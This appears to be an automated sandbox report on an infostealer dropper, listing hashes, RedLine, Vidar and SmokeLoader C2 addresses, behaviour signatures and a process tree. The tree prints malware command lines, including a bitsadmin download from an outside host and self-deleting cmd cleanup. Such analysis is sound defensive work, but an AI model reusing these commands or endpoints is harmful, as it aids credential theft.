Resubmissions

06-09-2021 14:13

210906-rjpvrsedbm 10

08-07-2021 11:08

210708-4gztl3mwl6 10

08-07-2021 08:02

210708-klfb4qeda6 10

07-07-2021 09:39

210707-nem57xyvf2 10

06-07-2021 17:51

210706-7pcrmjy3fa 10

06-07-2021 13:45

210706-eybelwcq86 10

05-07-2021 04:26

210705-z99jkt6lce 10

Analysis

  • max time kernel
    433s
  • max time network
    850s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    08-07-2021 11:08

General

  • Target

    setup_x86_x64_install - копия (22).exe

  • Size

    3.2MB

  • MD5

    3ae1c212119919e5fce71247286f8e0e

  • SHA1

    97c1890ab73c539056f95eafede319df774e9d38

  • SHA256

    30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e

  • SHA512

    5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Malware Config

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Signatures

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 40 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 19 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 9 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 30 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
      PID:2356
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2692
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2676
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2576
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2376
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1880
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1440
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1284
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1244
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1088
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      • Modifies registry class
                      PID:296
                      • C:\Users\Admin\AppData\Roaming\hwwtgtv
                        C:\Users\Admin\AppData\Roaming\hwwtgtv
                        2⤵
                          PID:7080
                        • C:\Users\Admin\AppData\Roaming\frwtgtv
                          C:\Users\Admin\AppData\Roaming\frwtgtv
                          2⤵
                            PID:7096
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:348
                          • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (22).exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (22).exe"
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3856
                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2664
                              • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\setup_install.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\setup_install.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of WriteProcessMemory
                                PID:344
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c arnatic_1.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3364
                                  • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_1.exe
                                    arnatic_1.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3988
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
                                      6⤵
                                        PID:5080
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im arnatic_1.exe /f
                                          7⤵
                                          • Kills process with taskkill
                                          PID:208
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 6
                                          7⤵
                                          • Delays execution with timeout.exe
                                          PID:1700
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c arnatic_3.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:8
                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_3.exe
                                      arnatic_3.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Modifies registry class
                                      • Suspicious use of WriteProcessMemory
                                      PID:2412
                                      • C:\Windows\SysWOW64\rUNdlL32.eXe
                                        "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                        6⤵
                                        • Loads dropped DLL
                                        • Modifies registry class
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:2796
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c arnatic_5.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3456
                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_5.exe
                                      arnatic_5.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1256
                                      • C:\Users\Admin\AppData\Roaming\2017976.exe
                                        "C:\Users\Admin\AppData\Roaming\2017976.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1596
                                      • C:\Users\Admin\AppData\Roaming\2995175.exe
                                        "C:\Users\Admin\AppData\Roaming\2995175.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4132
                                      • C:\Users\Admin\AppData\Roaming\1014987.exe
                                        "C:\Users\Admin\AppData\Roaming\1014987.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        PID:4068
                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4528
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c arnatic_6.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1224
                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_6.exe
                                      arnatic_6.exe
                                      5⤵
                                      • Executes dropped EXE
                                      PID:3076
                                      • C:\Users\Admin\Documents\yEO3yo_DAJIJKx66nc8YjYxF.exe
                                        "C:\Users\Admin\Documents\yEO3yo_DAJIJKx66nc8YjYxF.exe"
                                        6⤵
                                        • Drops file in Drivers directory
                                        • Executes dropped EXE
                                        PID:4440
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe"
                                          7⤵
                                            PID:5096
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                              8⤵
                                              • Checks processor information in registry
                                              • Modifies registry class
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4708
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4708.0.320459565\1944100116" -parentBuildID 20200403170909 -prefsHandle 1464 -prefMapHandle 1456 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4708 "\\.\pipe\gecko-crash-server-pipe.4708" 1548 gpu
                                                9⤵
                                                  PID:5132
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4708.3.481789188\1962919685" -childID 1 -isForBrowser -prefsHandle 5316 -prefMapHandle 5312 -prefsLen 156 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4708 "\\.\pipe\gecko-crash-server-pipe.4708" 5328 tab
                                                  9⤵
                                                    PID:5796
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4708.13.295130124\381635991" -childID 2 -isForBrowser -prefsHandle 3368 -prefMapHandle 3740 -prefsLen 7014 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4708 "\\.\pipe\gecko-crash-server-pipe.4708" 3892 tab
                                                    9⤵
                                                      PID:5500
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4708.20.1224811540\984029212" -childID 3 -isForBrowser -prefsHandle 5008 -prefMapHandle 4940 -prefsLen 7861 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4708 "\\.\pipe\gecko-crash-server-pipe.4708" 2412 tab
                                                      9⤵
                                                        PID:5424
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                    7⤵
                                                    • Enumerates system info in registry
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:1596
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa48bf4f50,0x7ffa48bf4f60,0x7ffa48bf4f70
                                                      8⤵
                                                        PID:5884
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2552 /prefetch:1
                                                        8⤵
                                                          PID:5760
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2544 /prefetch:1
                                                          8⤵
                                                            PID:5568
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2292 /prefetch:8
                                                            8⤵
                                                              PID:5352
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1736 /prefetch:8
                                                              8⤵
                                                                PID:5968
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1688 /prefetch:2
                                                                8⤵
                                                                  PID:5268
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
                                                                  8⤵
                                                                    PID:2480
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
                                                                    8⤵
                                                                      PID:5144
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:1
                                                                      8⤵
                                                                        PID:1696
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:1
                                                                        8⤵
                                                                          PID:6148
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:8
                                                                          8⤵
                                                                            PID:6752
                                                                          • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                            "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                            8⤵
                                                                              PID:6804
                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6a8bfa890,0x7ff6a8bfa8a0,0x7ff6a8bfa8b0
                                                                                9⤵
                                                                                  PID:6820
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5764 /prefetch:8
                                                                                8⤵
                                                                                  PID:6868
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1668 /prefetch:8
                                                                                  8⤵
                                                                                    PID:4788
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1652 /prefetch:8
                                                                                    8⤵
                                                                                      PID:5340
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1664 /prefetch:8
                                                                                      8⤵
                                                                                        PID:5076
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 /prefetch:8
                                                                                        8⤵
                                                                                          PID:5020
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1676,16719185671555468729,13107967949658717812,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1972 /prefetch:2
                                                                                          8⤵
                                                                                            PID:392
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "cmd.exe" /C taskkill /F /PID 4440 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\yEO3yo_DAJIJKx66nc8YjYxF.exe"
                                                                                          7⤵
                                                                                            PID:4612
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /F /PID 4440
                                                                                              8⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:6288
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "cmd.exe" /C taskkill /F /PID 4440 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\yEO3yo_DAJIJKx66nc8YjYxF.exe"
                                                                                            7⤵
                                                                                              PID:5892
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /F /PID 4440
                                                                                                8⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:6308
                                                                                          • C:\Users\Admin\Documents\lf7kqgYIj_UYFoZndl4fwd1B.exe
                                                                                            "C:\Users\Admin\Documents\lf7kqgYIj_UYFoZndl4fwd1B.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4376
                                                                                          • C:\Users\Admin\Documents\11uKiLpyHR6spBzCSTk8E3d1.exe
                                                                                            "C:\Users\Admin\Documents\11uKiLpyHR6spBzCSTk8E3d1.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:2100
                                                                                            • C:\Users\Admin\Documents\11uKiLpyHR6spBzCSTk8E3d1.exe
                                                                                              C:\Users\Admin\Documents\11uKiLpyHR6spBzCSTk8E3d1.exe
                                                                                              7⤵
                                                                                                PID:2168
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2168 -s 24
                                                                                                  8⤵
                                                                                                  • Program crash
                                                                                                  PID:4216
                                                                                            • C:\Users\Admin\Documents\4U2WMCIfF4i3BVROI5rew9I8.exe
                                                                                              "C:\Users\Admin\Documents\4U2WMCIfF4i3BVROI5rew9I8.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Drops file in Program Files directory
                                                                                              PID:4192
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso810A.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:3328
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso810A.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:3496
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso810A.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:5560
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso810A.tmp\tempfile.ps1"
                                                                                                      7⤵
                                                                                                        PID:5296
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso810A.tmp\tempfile.ps1"
                                                                                                        7⤵
                                                                                                          PID:5364
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso810A.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                            PID:4692
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso810A.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                            • Checks for any installed AV software in registry
                                                                                                            PID:5920
                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                            "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
                                                                                                            7⤵
                                                                                                            • Download via BitsAdmin
                                                                                                            PID:2412
                                                                                                        • C:\Users\Admin\Documents\eAP36wqZ5ygrAs89Wpe1L6Ko.exe
                                                                                                          "C:\Users\Admin\Documents\eAP36wqZ5ygrAs89Wpe1L6Ko.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:4372
                                                                                                        • C:\Users\Admin\Documents\vUT5pxZc_H6Au4ftIrz6DTHV.exe
                                                                                                          "C:\Users\Admin\Documents\vUT5pxZc_H6Au4ftIrz6DTHV.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:3748
                                                                                                          • C:\Users\Admin\Documents\vUT5pxZc_H6Au4ftIrz6DTHV.exe
                                                                                                            C:\Users\Admin\Documents\vUT5pxZc_H6Au4ftIrz6DTHV.exe
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4524
                                                                                                        • C:\Users\Admin\Documents\E377kPXJOmf1HIw9qEWPSIG8.exe
                                                                                                          "C:\Users\Admin\Documents\E377kPXJOmf1HIw9qEWPSIG8.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:3732
                                                                                                          • C:\Users\Admin\Documents\E377kPXJOmf1HIw9qEWPSIG8.exe
                                                                                                            "C:\Users\Admin\Documents\E377kPXJOmf1HIw9qEWPSIG8.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:644
                                                                                                        • C:\Users\Admin\Documents\ilnel1zZWeKOEgx8fBMFC1lq.exe
